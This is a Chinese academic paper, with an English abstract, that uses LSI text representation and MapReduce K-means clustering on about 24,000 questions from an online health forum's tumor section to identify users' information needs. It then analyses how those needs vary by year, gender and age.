Advanced Search
数据分析与知识发现, 2019, 3(4): 22-32
doi: 10.11925/infotech.2096-3467.2018.1153
中文网络健康社区中的用户信息需求挖掘研究*——以求医网肿瘤板块数据为例
Research on User Information Requirement in Chinese Network Health Community: Taking Tumor-forum Data of Qiuyi as an Example
陆泉1,2, 朱安琪1, 张霁月1, 陈静3,

摘要:

【目的】构建适应大数据环境的中文网络健康社区用户信息需求挖掘框架, 以肿瘤科为例分析用户信息需求。【方法】使用潜在语义索引(LSI)模型和MapReduce分布式文本聚类技术对中文网络健康社区——求医网肿瘤板块的全部提问数据(共计24 305条)进行用户信息需求挖掘。【结果】挖掘出用户的5个信息需求类目及其占比: 治疗(43.3%)、病理及病因(34.5%)、检查(12.1%)、术后(7.0%)、预防(3.1%), 各类目下Top20关键词; 发现国内外各需求类目占比差异巨大; 预防信息需求将持续上升; 需求的性别差异显著, 男性最关注治疗信息、女性最关注病理及病因信息; 需求的年龄差异较大, 青年群体占比极高(83.79%)等。【局限】可能存在更好的阈值选择, 更完整医学主题词表; 尚未进行信息需求的多维分析。【结论】本文框架可在大数据环境下挖掘用户信息需求, 并分析需求的变化趋势以及年龄与性别差异。

关键词: 网络健康社区 ; 信息需求 ; 大数据挖掘 ; 分布式文本聚类 ; 肿瘤

Abstract:

[Objective] This paper constructs an information demand mining framework of Chinese online health community users adapted to the big data environment, and analyzes the user information needs by taking the data of tumor-forum as an example. [Methods] The Latent Semantic Indexing (LSI) model and MapReduce distributed text clustering technology were used in this framework to mine the user information needs. We use all the Q&A data (24,305 in total) from tumor-forum of Chinese online health community (qiuyi.cn) as the experimental data source. [Results] The proposed framework mines the five information needs and their proportions of the tumor users: treatment (43.3%), pathology and etiology (34.5%), examination (12.1%), postoperative (7.0%), prevention (3.1%), and top 20 keywords of these needs. The analysis shows the growth of each needs, and the significant difference between domestic users and foreign users. Gender differences are also significant, the male need treatment information most, while female need pathological and etiological information most. Age difference is large too, and the information needs of young people are the largest (83.79%), etc. [Limitations] There may be better threshold selection, and the medical thesaurus is not prefect. The analysis of information needs is not multidimensional. [Conclusions] The proposed framework is feasible. The paper found the trend of the demand distribution changes with year and the distribution of users information needs vary with age or gender.

Key words: Online Health Community ; Information Needs ; Big Data Mining ; Distributed Text Clustering ; Tumor

1 引 言

网络健康社区已成为用户获得健康信息的主要途径之一, 如国外的Diabetic Connect、PatientsLikeMe, 国内的丁香园、求医网等。2017年第39次中国互联网络发展状况统计报告指出, 截至2016年12月, 中国互联网医疗用户规模为1.95亿, 占网民的27.2%, 在线医疗保健信息查询、在线预约挂号和在线咨询问诊总使用率为18.4%[1]。国内外政府对于公众的健康信息都极其关注, 如“欧盟健康计划”(2014-2020)将健康信息管理确定为23个优先领域之一[2]。2017年国家卫生和计划生育委员会颁布的“十三五”全国人口健康信息化发展规划指出要大力加强健康信息化和健康医疗大数据服务体系建设[3]。但各种网络健康社区所提供的信息质量参差不齐, 专业知识匮乏的普通用户很难从网上获得所需要的高质量健康信息。因此, 了解网络健康社区用户的信息需求, 并有针对性地提供健康信息服务显得尤为重要。目前采用中文数据源的网络健康社区信息需求研究极少, 且国内外大多数健康信息需求研究的样本量较少、研究方法较传统, 已不能满足大数据时代的需求。

为更好地研究中文网络健康社区用户的信息需求, 本文提出一种通用的基于大数据挖掘的中文网络健康社区用户信息需求挖掘框架。并以肿瘤为例, 爬取求医网(http://www.qiuyi.net)的相关问答数据(共计24 305条)为实验数据源, 运用本文所提出的框架, 结合相关医学文献, 得到用户对于肿瘤疾病的信息需求模型, 以及信息需求的趋势变化特征与分布特征。

2 研究现状
2.1 特定疾病的健康信息需求研究

对特定疾病进行健康信息需求研究是目前国内外最常见的研究形式, 其中, 对于癌症疾病的健康信息需求研究是最广泛的[4]。Oh等[5]爬取Yahoo! Answers问答平台上的81 434个与癌症有关的问题, 使用文本聚类的方法得出用户关于癌症信息的需求, 以此帮助相关医疗机构和医疗服务提供者更好地理解用户的多维信息需求。Tsuya等[6]爬取Twitter上与癌症相关的推文, 使用文本挖掘的方法对推文进行分析得出患者在社交平台上的信息需求。还有研究发现, 即使处于偏远地区的患者也在积极使用互联网搜寻相关健康信息以更有效地进行疾病管理[7]。国内也有很多学者从特定疾病的角度对用户健康信息需求进行研究。魏永婷等[8]对69名肿瘤癌症化疗患者进行信息需求调查, 发现患者对于疾病治疗方法、症状、药物是否存在副作用等方面的信息需求较高。也有学者通过问卷调查将癌症患者信息需求分为诊断、治疗、预后、其他4个维度[9]

2.2 健康信息需求影响因素研究

很多学者对影响健康信息需求的因素进行研究, 如年龄、性别、文化程度、用户自身健康状况等。研究表明癌症患者年龄越小, 越积极获得相关健康信息[10]。同时, 女性信息需求程度相较男性更弱[11], 且不同性别用户对于试验性疗法或药品的信息关注度、性健康以及瘦身美容上表现出显著差异[12]; 在文化程度上, 有学者发现不同文化程度的用户对于健康资讯、心理健康等的需求存在差异, 且用户的健康状况对于其对信息的迫切程度有直接影响[13]

2.3 健康信息需求研究方法

为更好地展示在研究健康信息需求时所采用的研究方法, 现将国内外学者所使用的方法进行文献梳理, 结果如表1所示。

表1 健康信息需求研究方法整理

综上, 目前国内外学者在研究健康信息需求时多以特定疾病作为切入点, 从年龄、性别等方面分析用户需求的异同, 但在研究方法上多以定性分析法为主, 很少从文本自身角度对用户的信息需求进行挖掘, 且大多数研究的样本量较小, 难以代表广大用户的需求。而少量采用传统文本挖掘方法的研究, 忽略了大数据时代文本挖掘计算量急剧增加的事实且大多数研究采用国外数据源, 如Yahoo! Answers, 极少以中文网络健康社区数据作为数据源, 且此类研究所采用的数据都是普通网络问答社区, 如百度知道, 几乎没有研究涉及常见的网络健康社区问答板块的数据。

针对现有网络健康社区信息需求研究的不足, 本文提出中文网络健康社区用户信息需求挖掘框架, 以中文网络健康社区的数据作为数据源, 结合大数据挖掘技术, 解决大规模数据聚类效率低的问题。

3 基于大数据的中文网络健康社区用户信息需求挖掘框架

基于大数据挖掘的中文网络健康社区的用户信息需求挖掘技术框架如图1所示。首先采集网络健康社区特定疾病的相关信息数据; 然后进行数据处理, 包括分词、去停用词、特征提取等; 再进行基于MapReduce的K-means聚类, 对聚类结果进行分析与评估; 最终输出特定疾病的需求类目和每个类目下的Top5关键词与关键词标签云, 以及需求分布特征和趋势变化特征。

图1 基于大数据挖掘的中文网络健康社区的用户信息需求挖掘框架

3.1 数据采集与数据处理

在数据采集阶段, 首先需要确定数据源, 即中文网络健康社区中关于某一疾病的相关提问文本, 再通过相关网络爬虫获取网页中所需要的信息。本文实验使用Python的Scrapy爬虫框架, 通过Twisted异步网络库处理网络通信、提取结构化数据。数据采集完成后, 对得到的论坛提问文本数据集进行处理, 具体操作过程如图2所示。

图2 数据处理过程

(1) 分词及去停用词

与英文不同, 中文的词与词之间并无明确分隔符, 需进行分词处理[23]。因本研究文本数据源涉及医疗健康领域专业术语, 所以需结合已有中文医学主题词表以提高分词的准确性。去停用词指自动过滤文本中对于检索没有区分意义和实际应用价值的词语, 可采用建立停用词表法进行处理。采用Jieba分词工具结合CNKI发布的中文医学主题词表CMesh进行分词处理, 并用百度停用词表对文本数据进行去除停用词处理。

(2) 特征表示与提取

常娥[24]提出的潜在语义索引(Latent Semantic Analysis, LSI)模型使得文本向量空间中每一维不再简单反映词条的分布关系和出现频度, 它反映的是强化的语义关系, 并大大降低了向量空间的维数, 有效提高文本聚类的速度。因此, 使用基于LSI模型的文本表示方法实现特征表示与提取。本文设定r =300, 取分解后的V矩阵的前300列, 构成特征矩阵Vr进行后续的文本聚类。

3.2 基于大数据挖掘的文本聚类

(1) 基于MapReduce的分布式文本聚类算法

大数据背景下, 网络健康社区的提问数随着时间增加会急速增长, 为解决大规模文本聚类问题, 李钊等[25]对传统的K-means聚类算法进行优化, 使用基于MapReduce的分布式文本聚类算法对帖子内容进行聚类分析, 极大地提高聚类效率。K-means算法的核心是计算每个样本和聚类中心的距离, 将样本分配到距离最近的簇中。MapReduce主要由两部分构成: Map和Reduce。Map任务区用于计算聚类中心, Reduce任务区用于更新聚类中心。具体聚类分析过程如图3所示, 其中相似度采用欧氏距离公式[25]计算。

图3 基于MapReduce的分布式聚类分析过程

(2) 聚类算法参数选择及效果评估级

采用距离最大化原则[26]选择初始聚类中心, 该方法主要根据确定的距离阈值寻找聚类中心, 然后根据最近邻规则把模式样本划分到各类距离中心对应的类别中。采用肘部法则(Elbow)确定聚类簇数k值, 依据公式(1)[27]计算与绘制不同k值情况下的成本函数值曲线。k值增大过程中, 曲线肘部(下降幅度最大的位置)对应的k值即所选聚类簇数。

$J=\sum\nolimits_{1}^{k}{\sum\nolimits_{i}{\in {{C}_{k}}}{{\left| {{x}_{i}}-{{u}_{k}} \right|}^{2}}}$ (1)

其中, u是第k个类的中心坐标。

因文本聚类是非监督的学习算法, 有学者提出轮廓系数(Silhouette Coefficient)对结果进行评估[28]。轮廓系数是类内密集与类间分散程度的评价指标。通常认为, 轮廓系数最大值所对应的数为最优聚类数。因此, 以轮廓系数值确定所选聚类簇数k值为聚类效果最好的k值。

使用Spark的MLlib实现上述分布式文本聚类算法, 确定聚类簇数k = 7, 并使用轮廓系数对聚类效果进行评估, 完成文本聚类。

3.3 数据展示

(1) 需求识别

主题识别的文本聚类研究过程中, 基于频繁值的表示法因降低了文本维度且效果更好而常被使用[10], 因此本研究也采用此方法表示聚类结果。对每一个簇内文本集使用TF-IDF方法提取关键词, 并对聚类结果进行人工合并。此处参照李重阳等[22]的研究, 将病因和症状的主题簇合并为病理及病因; 参照金碧漪等[19]的研究, 将药物治疗与手术治疗的主题簇合并为治疗。最终得到用户信息需求类目及每个类目所对应的关键词, 并给出每个需求类目下Top5关键词及其关键词标签云展示不同结果对象(关键词的TF-IDF值越大, 词的标签字体越大, 反之亦然)。

(2) 需求变化趋势与分布分析

采集的数据不仅包括问题描述, 还有提问者自身信息, 如年龄、性别、提问时间等。为进一步探究用户信息需求的特征, 使用描述统计和卡方检验的统计分析方法研究用户信息需求趋势和分布, 统计分析法得到信息需求的年份变化趋势、利用卡方检验的方法探究信息需求分布是否存在显著的性别差异和年龄差异。统计结果使用饼状图、柱状图、环形图、堆积条形图等进行各类别差异的可视化呈现。

4 实验过程及需求分析结果
4.1 实验环境及数据来源

实验数据源来自网络健康社区求医网。求医网包含1 500多个针对不同疾病类型的问答板块, 截至2016年10月31日, 其问题帖数已超过200万, 成功为1 625 278名用户解答了疑惑。因不同疾病板块的用户具有不同的信息需求, 而肿瘤科疾病的关注人数最多, 所以选取肿瘤科自2011年10月1日-2016年10月31日的问答板块全部提问数据(共24 305条记录)作为验证需求挖掘框架的数据源, 每条记录包含问题标题、性别、年龄、科室、日期、问题描述等数据项。

本文实验在Windows系统环境下、使用PyCharm开发环境、以Python3.0作为汇编语言, 按照第3节的挖掘框架进行数据采集、数据处理、分布式文本聚类及需求分析结果数据展示。

4.2 原始数据统计分析

原始数据进行基本处理后, 其统计分析如表2所示。可以看出, 自2011年起提问数一直保持快速增长趋势, 2016年因大量同质网站出现并分流了用户, 致使提问数转为略有下降。

表2 求医网肿瘤科问答板块问答数据年份统计

4.3 基于大数据挖掘的聚类结果分析

(1) 聚类数k的确定与聚类效果评估

在文本聚类分析中, 采用肘部法则确定k值。设置k值从2变换到13, 绘制畸变曲线如图4所示。可以看出, k=7时为该曲线的肘部。再绘制轮廓系数曲线评估聚类的效果, 如图5所示, 可以看出, k=7时聚类效果最好, 因此本实验中选择k=7是合理的。

图4 k-平均畸变程度曲线

图5 k-平均轮廓系数曲线

(2) 聚类结果分析

最终形成的肿瘤患者的信息需求类目及关键词Top5如表3所示, 各类目具体需求问题数量分布如图6所示。此处的关键词Top5剔除了“脑瘤”、“肌瘤”等肿瘤名称词语, 及“几天”、“这是”等无意义的词语。

表3 肿瘤患者信息需求类目及关键词表

图6 求医网肿瘤科各需求类目下提问数量分布

表3可以看出, 用户的健康信息需求主要集中在治疗、病理及病因、检查、术后、预防5个主题类目上, 且图6表明治疗、病理及病因是用户的主要需求。其中, 治疗相关问题数量为10 524条, 约占总问题数的43.30%, 关注度最高; 病理及病因相关问题数为8 383条, 约占总问题数的34.49%, 关注度次高; 而预防相关问题数仅有761条, 约占总问题数的3.13%, 关注度最小。然而国外学者使用网络数据进行的肿瘤信息需求研究显示, 普通公众对于预防信息关注度最高(88.2%), 紧随其后的是关于治疗的信息(48.0%)[29]。对比可见, 国内外网络健康社区用户对于健康信息的需求主题差异较大。

表3图6表明中国民众对于肿瘤预防信息没有太多关注, 只有出现明显病症后才去了解相关治疗手段和病理病因, 但发病后的肿瘤往往已到达中晚期, 错过了最佳治疗时间, 这也从侧面揭示中国肿瘤发病率接近世界水平, 但是致死率高于世界水平的原因。如果相关组织部门对肿瘤早期预防知识进行推广, 提高广大民众的关注度, 及早检查发现肿瘤症状并进行预防和治疗, 可以大大提高治疗成功率和患者生存率。

进而, 提取各主题关键词及前20关键词TF-IDF值, 结果如表4所示。

表4 肿瘤患者信息需求各类目前20关键词TF-IDF值

可看出在“治疗”需求主题中, 关于其子类目“药物”的提问(中药、药物、吃药等)相较于其子类目“手术”的提问(手术、切除、化疗、化验、放疗等)要少得多, 说明肿瘤治疗中多以手术治疗为主, 药物治疗为辅, 用户需求集中在手术的治疗项目及效果上; 在“病理及病因”需求主题中, 用户需求集中在不同类型肿瘤的发病原理及症状上, 如肿瘤是否会引起疼痛、流血等症状; 在“检查”需求主题中, 用户需求集中在化验、CT、彩超等检查结果能否自我判断是否患有肿瘤疾病; 在“术后”需求主题中, 因肿瘤在术后易复发或转移, 用户需求集中在术后恢复上, 如正确的术后恢复治疗和如何有效降低复发率等; 在“预防”主题需求中, 用户需求集中在不健康的生活方式会导致老人和孩子患上肿瘤。

4.4 信息需求趋势分析与分布分析

(1) 信息需求年份趋势变化分析

用户对于肿瘤的信息需求的年份分布如表5所示。可以看出, 病理及病因知识的需求量占比总体呈下降趋势, 而预防知识的需求则是先下降后上升。可能是因为随着网络健康社区中健康知识的普及, 用户对于肿瘤基础知识的了解增多, 因而需求量下降, 进而人们逐渐意识到预防肿瘤的重要性, 因此对预防的需求量提高。参考发达国家现状可推测, 对肿瘤预防知识的需求在未来将持续上升。

表5 各类目信息需求量年份分布

(2) 信息需求分布性别差异分析

用户对肿瘤的信息需求的性别分布如图7所示。通过各需求类目提问总数占比, 可以发现不同性别用户对于健康信息需求的偏好不同。总体看来, 男性用户的提问数量远多于女性用户, 比例约为3(18 223):1(6 082)。有报告显示[30], 2015年全国肿瘤患者中男女比例约为1.41:1, 这说明健康问答社区中, 在考虑男性患病率高于女性的情况下, 男性用户在互联网上寻求帮助的意愿仍然大于女性用户。

图7 不同性别用户信息需求分布

为更好地说明不同性别用户间差异, 使用卡方检验进一步分析。结果显示χ2=35.097, P小于0.001, 说明不同性别用户的信息需求存在显著差异。对于女性而言, 最迫切的信息需求为病理及病因, 其次为治疗。而男性最关注的是治疗, 其次为病理及病因。可见, 不同性别的用户有不同的信息需求偏好, 女性更偏向于了解原因, 而男性更加关注如何处理, 因此医疗健康网站可将用户性别作为其推送癌症健康信息的定制因素。

(3) 信息需求分布年龄差异分析

剔除年龄为0的异常数据后, 用户对肿瘤信息需求的年龄分布如图8所示。从提问数上看, 数量最多的是青年, 占总提问数的83.79%(18 003条), 其后依次为中年、老年及儿童。一方面, 青年是年龄在16岁-35岁之间的用户, 他们是互联网的主要使用群体, 因此也是网络健康社区的主要用户。另一方面, 这与中国社会高度关注中青年群体肿瘤高发及增长迅速有关。

图8 不同年龄用户信息需求分布

图8可看出不同年龄用户在各类目上的信息需求比例相差较大。其中, 青年在病理及病因(37.27%)和治疗(38.72%)方面的信息需求量接近, 有别于其他年龄组重点关注治疗。这表明青年用户在关心治疗方法与结果的同时也关注专业知识。

考虑性别因素进一步分析青年群体的信息需求分布, 具体结果如图9所示。在青年组, 男女提问总数比例约为3.71(14 222条): 1(3 816条), 与总体情况接近。卡方检验结果显示χ2=600.072, P小于0.001, 说明在青年组中不同性别的用户也有不同信息需求。从图9可以看出, 女性用户更偏向于了解病理及病因的需求, 而男性用户也更关注治疗需求。

图9 青年组用户不同性别信息需求分布

4.5 小 结

将实验结果与发现整理如表6所示, 在肿瘤信息需求上性别差异与年龄差异显著, 此二者可能是网站癌症健康信息的重要定制因素。

表6 求医网肿瘤科用户信息需求总结

5 结 语

本文针对现有网络健康社区信息需求研究的不足, 结合大数据挖掘技术, 提出一种基于分布式文本聚类的中文网络健康社区用户信息需求框架。此框架区别于传统定性研究方法与适合小样本数据的传统文本挖掘方法, 可有效支持大数据环境下的中文网络健康社区用户健康信息需求挖掘。基于求医网肿瘤科提问数据的实验表明, 该框架能有效分析用户的信息需求类目以及需求的趋势变化与分布特征。

本研究也存在一些不足, 如数据处理过程的阈值和词表选择还可继续优化, 还可以尝试使用标注数据训练多分类器, 完成多维度的信息需求分析。

作者贡献声明

陆泉: 提出研究思路, 论文修改及最终版本修订;

朱安琪: 设计数据分析方法, 数据处理与分析, 论文起草;

张霁月: 设计研究方案, 采集数据;

陈静: 实验结果分析, 论文修订。

利益冲突声明

所有作者声明不存在利益冲突关系。

支撑数据

支撑数据由作者自存储, E-mail: Aprilzaq@163.com。

[1] 朱安琪. qiuyiwang.data.csv. 求医网在线问答板块数据集.

参考文献

[1] CNNIC. 第39次中国互联网络发展状况统计报告[EB/OL]. [2017-01-22] .http://www.cnnic.net.cn/hlwfzyj/hlwxzbg/hlwtjbg/ 201701/P020170123364672657408.pdf
[本文引用:1]
(CNNIC. The 39th Statistical Report on the Development of Internet in China[EB/OL]. [2017-01-22]. http://www.cnnic.cn/hlwfzyj/ hlwxzbg/hlwtjbg/201601/P020160122444930951954.pdf
[2] 欧盟. 第三次健康成长计划(2014-2020)[EB/OL]. [2014-03-21]. https://ec.europa.eu/health/funding/programme_en.
[本文引用:1]
(The European Union. Third Health Programme (2014-2020)[EB/OL]. [2014-03-21]. )https://ec.europa.eu/health/funding/programme_en.
[3] 中华人民共和国国家卫生健康委员会. “十三五”全国人口健康信息化发展规划[R/OL]. [2018-03-21]. http://ghs.ndrc. gov.cn/ghwb/gjjgh/201707/t20170720_855014.html
[本文引用:1]
(National Health and Family Planning Commission. “13th Five-Year Plan”: National Population Health Information Development Plan[R/OL]. [2018-03-21]. http://ghs.ndrc.gov.cn/ghwb/gjjgh/ 201707/t20170720_855014.html
[4] 赵海平, 邓胜利. 基于社会化问答平台的用户健康信息行为研究综述[J]. 信息资源管理学报, 2016(4): 19-27.
社会化问答服务逐渐成为人们搜寻健康信息和寻求社会支持的主要途径。本文采用数据库检索和追溯检索两种方法,搜集近年来国外学者关于社会化问答平台用户健康信息行为的文章并进行系统性综述,对文献的研究主题从健康信息质量评价、健康信息分享行为、健康信息搜寻行为、健康信息需求、健康信息使用行为以及用户特征等六个方面进行归类分析,希望综述结果可以为我国学者开展相关研究提供依据和指引。
DOI:10.13365/j.jirm.2016.04.019      URL     [本文引用:1]
(Zhao Haiping, Deng Shengli.Literature Review of Users' Health Information Behavior in Social Q&A Platform: Research Topic and Method[J]. Journal of Information Resources Management, 2016(4): 19-27.)
[5] Oh S, Zhang Y, Park M S.Cancer Information Seeking in Social Question and Answer Services: Identifying Health-Related Topics in Cancer Questions on Yahoo! Answers[J]. Information Research, 2016, 21(3). http://www.informationr. net/ir/21-3/paper718.html#.XLlSRvl6enE
[本文引用:1]
[6] Tsuya A, Sugawara Y, Tanaka A, et al.Do Cancer Patients Tweet? Examining the Twitter Use of Cancer Patients in Japan[J]. Journal of Medical Internet Research, 2014, 16(e5): e137.
Twitter is an interactive, real-time media that could prove useful in health care. Tweets from cancer patients could offer insight into the needs of cancer patients.The objective of this study was to understand cancer patients' social media usage and gain insight into patient needs.A search was conducted of every publicly available user profile on Twitter in Japan for references to the following: breast cancer, leukemia, colon cancer, rectal cancer, colorectal cancer, uterine cancer, cervical cancer, stomach cancer, lung cancer, and ovarian cancer. We then used an application programming interface and a data mining method to conduct a detailed analysis of the tweets from cancer patients.Twitter user profiles included references to breast cancer (n=313), leukemia (n=158), uterine or cervical cancer (n=134), lung cancer (n=87), colon cancer (n=64), and stomach cancer (n=44). A co-occurrence network is seen for all of these cancers, and each cancer has a unique network conformation. Keywords included words about diagnosis, symptoms, and treatments for almost all cancers. Words related to social activities were extracted for breast cancer. Words related to vaccination and support from public insurance were extracted for uterine or cervical cancer.This study demonstrates that cancer patients share information about their underlying disease, including diagnosis, symptoms, and treatments, via Twitter. This information could prove useful to health care providers.
DOI:10.2196/jmir.3298      PMID:4060148      URL     [本文引用:2]
[7] Shaw R J, Johnson C M.Health Information Seeking and Social Media Use on the Internet Among People with Diabetes[J]. Online Journal of Public Health Informatics, 2011, 3(1). DOI:10.5210/ojphi.v3i1.3561.
Abstract Patients who are active and involved in their self-management and care are more likely to manage chronic conditions effectively (6, 26). With a 5-fold increase in the incidence of chronic illness over the past 20 years, access to information can provide patients the tools and support to self-manage their chronic illness. New media technologies can serve as tools to engage and involve patients in their health care. Due to the increasing ubiquity of the Internet and the availability of health information, patients are more easily able to seek and find information about their health.. Thus, the Internet can serve as a mechanism of empowerment (4, 5). This is especially important for people with diabetes mellitus where intensive self-management is critical.
DOI:10.5210/ojphi.v3i1.3561      PMID:3208902      URL     [本文引用:1]
[8] 魏永婷, 陈英, 许亚红. 癌症患者住院化疗期间健康信息需求状况调查分析[J]. 护理实践与研究, 2013, 10(11): 152-153.
目的:探讨癌症患者住院化疗期间健康信息需求情况并分析其相关因素,为癌症患者的临床护理提供参考.方 法:应用一般资料向卷、癌症患者健康信息需求量表对北京市某三级甲等医院肿瘤科的69例癌症住院化疗患者进行调查.结果:癌症患者住院化疗期间的整体健康 信息需求为低度到中度(1.39±0.47)分,患者对于疾病治疗、症状控制信息的需求较高;患者的健康信息需求与其疲乏程度具有相关性,重度疲乏患者的 健康信息需求高于轻度疲乏患者(P<0.05).结论:癌症患者住院化疗期间具有轻到中度的健康信息需求,患者的健康信息需求程度与其疲乏程度呈正相关, 临床工作中应有针对性地对患者进行个体化化的健康信息支持.
DOI:10.3969/j.issn.1672-9676.2013.11.086      URL     [本文引用:2]
(Wei Yongting, Chen Ying, Xu Yahong.Investigation and Analysis of the Health Information Needs Among Patients with Cancer During Chemotherapy in Hospital[J]. Nursing Practice and Research, 2013, 10(11): 152-153.)
[9] 黄雪薇, 张瑛, 王秀利, . 癌症患者的信息需求——《癌症患者信息选择问卷》的编制与评估[J]. 中国心理卫生杂志, 2003, 17(11): 750-753.
目的 :研制和测评癌症患者信息选择问卷 (IPQCP)。方法 :以严谨的程序编制问卷 ,并随机抽取 5 0 1例癌症患者、 169位亲属和 86位医护人员进行测定 ,对问卷作筛选和信度、效度等分析。结果 :1 最后问卷共有 19个条目 ,含诊断、治疗、预后、其他四个维度。 2 四个维度和总分的重测信度分别为 0 85、0 81、 0 83、 0 76和 0 96;Cronbachα分别为 0 82、 0 89、 0 99、 0 89和 0 95 ;分半信度为 0 95。 3 问卷能较好反映癌症患者对信息内容和量的需求 ,结构与设计的理论构思相符 ,参照Cassileth信息清单的效标效度为0 91。结论 :IPQCP具有较好的信度和效度 ,在临床上有一定的实用价值。
DOI:10.3321/j.issn:1000-6729.2003.11.007      URL     [本文引用:1]
(Huang Xuewei, Zhang Ying, Wang Xiuli, et al.Information Needs of Cancer Patients: Development and Evaluation of Information Preference Questionnaire for Cancer Patients[J]. Chinese Mental Health Journal, 2003, 17(11): 750-753.)
[10] Valero-Aguilera B, Bermudez-Tamayo C, Francisco Garcia-Gutierrez J, et al. Information Needs and Internet Use in Urological and Breast Cancer Patients[J]. Supportive Care in Cancer, 2014, 22(2): 545-552.
Aims This study aims to describe the information needs of urological and breast cancer patients and factors related to use of the Internet as a source of health information. Methodology A cross-sectional descriptive study was carried out, using individual questionnaire-based interviews held during the oncology appointments of 169 patients with urological cancer and 100 with breast cancer at the Virgen de las Nieves University Hospital in Granada, Spain. The variables studied were use of the Internet as a source of health information, health status, patient role in the decision-making process, information sources, satisfaction with the health-care system, type of information received, and Internet use. A multivariate logistic regression analysis was carried out. Results Breast cancer patients are more concerned with long-term results and the effects on their family and personal life. They are also interested in the experiences of other patients and support groups or staff who could help them to cope with their illness. The information needs of patients with urological cancer are linked to short-term alternative treatments, their sex life, keeping healthy, and exercise. More clinical aspects, such as tests and experiments linked to their treatment, are not a frequent information need. The factors linked to use of the Internet as a source of health information are younger age, high level of education, the patient active role in the decision-making process, and undergoing more aggressive treatment. There is no link between using the Internet as a source of health information and level of satisfaction with the health-care system, or with Internet use in general. Conclusion Patients need additional information about their illness on top of that given to them by health-care staff, and they often use the Internet to find it. The greatest information need is related to the effects of their illness on their day-to-day life. Health-care staff should provide patients with advice about reliable websites and how to search the Internet.
DOI:10.1007/s00520-013-2009-y      PMID:24122406      URL     [本文引用:3]
[11] Friedemann-Sanchez G, Griffin J M, Partin M R.Gender Differences in Colorectal Cancer Screening Barriers and Information Needs[J]. Health Expectations, 2007, 10(2): 148-160.
Context Several prior studies have found that women are less likely to be screened for colorectal cancer (CRC) than men. While the source of this screening differential is unknown, recent studies suggest gender differences in barriers to screening might explain the disparity.
DOI:10.1111/j.1369-7625.2006.00430.x      PMID:17524008      URL     [本文引用:1]
[12] 张馨遥, 曹锦丹. 网络环境下用户健康信息需求的影响因素分析[J]. 医学与社会, 2010, 23(9): 25-27.
目的:分析研究网络健康信息的使用状况、对网络健康信息内容的关注程度、网络获取健康信息的目的,总结网络环境下用户健康信息需求的影响因素,论述网络环境下不同用户信息需求的特点。方法:对320名受访者进行调查问卷的发放和网络调查法获取调查表收集相关数据,并辅以个人深入访谈。结果:在对试验性疗法或试验性药品的信息关注度、性健康和瘦身美容的相关信息三方面,不同性别用户均表现出差异性。不同文化层次的用户在对健康咨询、特定疾病、心理健康等五个方面的信息内容上也均有影响。用户的健康状况直接决定着其对健康信息需要的迫切性和目的性。
DOI:10.3870/YXYSH.2010.09.010      URL     [本文引用:3]
(Zhang Xinyao, Cao Jindan.The Analysis of Influence Factors of Health Information Network Users' Requirement[J]. Medicine and Society, 2010, 23(9): 25-27.)
[13] 郭光霞. 糖尿病患者健康信息需求调查分析及护理对策[J]. 基层医学论坛, 2008, 12(21): 628-629.
目的了解糖尿病患者对糖尿病知识的需求内容及获得糖尿病知识的方式,为糖尿病患者的教育提供依据。方法采用问卷调查法对103例出院糖尿病患者的糖尿病知识需求及获得知识的方式进行调查。结果糖尿病饮食知识、运动知识、合理用药知识、如何治疗糖尿病、糖尿病的并发症及危害知识需求排在前五位,占61.2%~77.7%;解决平时遇到的具体困惑或困难、糖尿病的病因及危险因素、糖尿病有哪些临床表现、心理因素和睡眠质量是否影响血糖控制水平、糖尿病鉴别与预防的相关知识排在后五位,占39.8%~45.6%;获得糖尿病知识的方式以住院期间接受糖尿病教育为主,占88.3%,从医生、护士和科普手册中获得糖尿病知识的占82.5%~86.4%,通过报刊、电视、网络获得的糖尿病知识占32%~56.3%;对是否相信现行的报纸杂志广告介绍的糖尿病知识这一问题进行了调查,91.3%的患者给予了否定回答。结论①制定全面的健康教育计划,为糖尿病患者提供系统的糖尿病防治知识;②培养一支具有丰富糖尿病知识的教育队伍;③准确评估糖尿病患者对糖尿病健康知识的需求;④建立长效健康教育机制,采取多种形式开展糖尿病患者健康教育。
DOI:10.3969/j.issn.1672-1721.2008.21.045      URL     [本文引用:1]
(Guo Guangxia.Health Survey Analysis and Nursing Countermeasure for Diabetic Patients[J]. Public Medical Forum Magazine, 2008, 12(21): 628-629.)
[14] 武燕燕, 姜亚芳. 住院化疗癌症患者信息需求的调查研究[J]. 中华现代护理杂志, 2010, 16(4): 384-387.
目的分析癌症患者信息需求现状和影响因素,以便更好地为癌症患者提供信息服务。方法采取方便抽样的方法,用癌症患者一般资料调查表、癌症患者信息选择问卷(IPQCP)对98例住院化疗癌症患者进行调查。结果98例患者IPQCP的总分和诊断(D)、治疗(T)、预后(P)、其他(0)维度均分别为(32.34±8.70),(4.92±0.26),(8.35±0.25),(8.76±2.61),(10.32±0.27)分;54.1%希望获知“一切,无论好坏”的信息;77.6%的患者认为信息量“越多越好”;多元回归显示,信息需求总分及各维度得分与患者年龄、手术经历、获知诊断所经历时间有统计学意义(P〈0.05)。结论癌症患者普遍存在信息需求,患者的年龄、手术经历、获知诊断时间的长短等对信息需求产生重要影响,因此应根据具体情况有针对性地向患者提供信息。
DOI:10.3760/cma.j.issn.1674-2907.2010.04.004      URL     [本文引用:1]
(Wu Yanyan, Jiang Yafang.Investigation of Information Needs of Chemotherapy Inpatients[J]. Chinese Journal of Modern Nursing, 2010, 16(4): 384-387.)
[15] Oh H J, Lauckner C, Boehmer J, et al.Facebooking for Health: An Examination into the Solicitation and Effects of Health-Related Social Support on Social Networking Sites[J]. Computers in Human Behavior, 2013, 29(5): 2072-2080.
The current study investigates people use of social networking sites for health purposes and its impact on their perception of social support and their health self-efficacy. A structural model was fitted to test hypothesized relationships between having a health concern, seeking online health information, seeking health-related social support on Facebook, perceived social support from Facebook friends, and health-related self-efficacy. The study also looks at the relative significance of social support dimensions including: emotional, informational, tangible, and esteem dimensions. An analysis of 291 respondents revealed a positive relationship between having health concerns and seeking health-related social support. Seeking support was significantly associated with all four social support dimensions. Among the four support dimensions, emotional support was the only significant predictor of health self-efficacy. Also, emotional support was the dimension that was most prevalent in Facebook contexts. Health information seeking was also positively associated with health self-efficacy but was not significantly related to having a health concern.
DOI:10.1016/j.chb.2013.04.017      URL     [本文引用:1]
[16] Ramo D E, Liu H, Prochaska J J.A Mixed-Methods Study of Young Adults' Receptivity to Using Facebook for Smoking Cessation: If You Build It, Will They Come?[J]. American Journal of Health Promotion, 2015, 29(4): e126-e135.
DOI:10.4278/ajhp.130326-QUAL-128      URL     [本文引用:2]
